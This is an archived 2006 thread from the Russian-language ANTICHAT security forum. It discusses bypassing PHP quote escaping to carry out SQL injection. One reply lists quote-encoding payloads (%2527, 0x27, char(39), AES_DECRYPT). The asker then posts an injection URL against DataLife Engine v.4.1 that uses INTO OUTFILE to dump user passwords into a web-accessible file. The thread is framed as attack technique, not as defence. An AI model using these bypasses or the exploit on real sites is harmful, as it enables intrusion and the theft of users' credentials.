HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу какие есть методы преобразования Sql запроса для обхода фильтрации
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

какие есть методы преобразования Sql запроса для обхода фильтрации
  #1  
Старый 12.09.2006, 14:35
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
Question какие есть методы преобразования Sql запроса для обхода фильтрации
например простейший запрос
SELECT * FROM users where name = 'geborat'
непроходит превращается в
SELECT * FROM users where name = 'geborat\'
в hex формате ковычка проходит но такой запрос не выполняется
SELECT * FROM users where name = 'geborat char(0x27)
выполняется в таком формате
SELECT * FROM users where name = 0x6765626f726174
но первую ковычку я убрать не могу так как она добавляется
самим php скриптом кроме того символ \тоже обрабатывается
он просто удваевается запрос
SELECT * FROM users where name = '\geborat
превращается в
SELECT * FROM users where name = '\\geborat
как еще можно попробовать вставить ковычку
 
Ответить с цитированием

  #2  
Старый 12.09.2006, 20:01
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию
%27
%2527
0x27
char(39)
AES_DECRYPT(AES_ENCRYPT(blabla_string,0x71),0x71), где 0х71 просто ключ
 
Ответить с цитированием

  #3  
Старый 16.09.2006, 22:01
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
в движке DataLife Engine v.4.1
мне удалось создать текстовый файл с паролями пользователей
_http://geborat.ru/index.php?subaction=userinfo&user=geborat%2527 INTO OUTFILE %2527/home/geborat.ru/www/1234.txt
правда почему то работает только на локахосте
на чужих сайтах запрос идет но файл не создается
может прав на запись нет или что то еще

к сожалению в DataLife Engine v.4.5 вобще не работает так как
закодираваную ковычку %2527 он распознает
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие Уязвимости есть в Iconboard? Fr1k Уязвимости CMS / форумов 10 25.11.2006 14:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ